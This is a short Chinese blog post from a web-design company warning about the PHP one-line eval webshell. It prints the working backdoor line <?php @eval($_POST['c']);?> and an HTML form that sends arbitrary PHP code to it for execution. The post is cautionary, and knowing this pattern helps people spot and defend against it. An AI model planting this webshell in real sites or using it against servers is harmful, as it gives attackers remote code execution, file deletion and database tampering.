在线咨询
福州网站建设>网站新闻>php技术

php一句话木马eval函数

发布日期:2017-03-19浏览次数:1233 来源:福州网站建设

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

 
1
<?php @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

 
1
2
3
4
5
6
7
8
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>

如果上面的phpinfo()改成其他 代码,删除某个文件夹或对数据库文件 进行删除或更改的操作的代码,那么后果就可想而知。市面上有很多配合一句话木马 的工具呢。所以,安全第一。

以上是由福州网站建设的小编为你分享了"php一句话木马eval函数"文章,如果你在这方面有什么问题,随时联系我们

上一篇:thinkphp creat方法自动验证教程 下一篇:怎么彻底去掉ECSHOP版权与标志 返回栏目列表
php技术有关的文章
踩坑之json_encode精度丢失问题
ECshop中TemplateBeginEditable 和lbi库文件中一些说明
PHP利用纯真IP数据库在本地实现IP地址信息查询
CentOS7安装sudo yum install ffmpeg ffmpeg-devel
子元素使用float 父元素撑开方法子元素float 父元素border
在wdcp后台如何创建用不同端口访问的网站
Bootstrap之折叠和展开(Collapse)教程
宝塔面板无法启动redis案例
不通过App Store,在iOS设备上直接安装应用程序
php找出当前函数被那个函数(文件)调用
Bootstrap之折叠和展开(Collapse)教程
使用font-awesome小图标
如果您有什么问题,欢迎咨询我们客服! 点击QQ咨询
联系方式

地址:福建省福州市海通广场2号楼

电话:18558752805
Copyright © 2017-2022  www.xl779.com福州网站制作 福州小程序制作福州网站建设 闽ICP备16037694号-2

  • 福州网站建设_福州网站设计_福州微信公众号开发_福州小程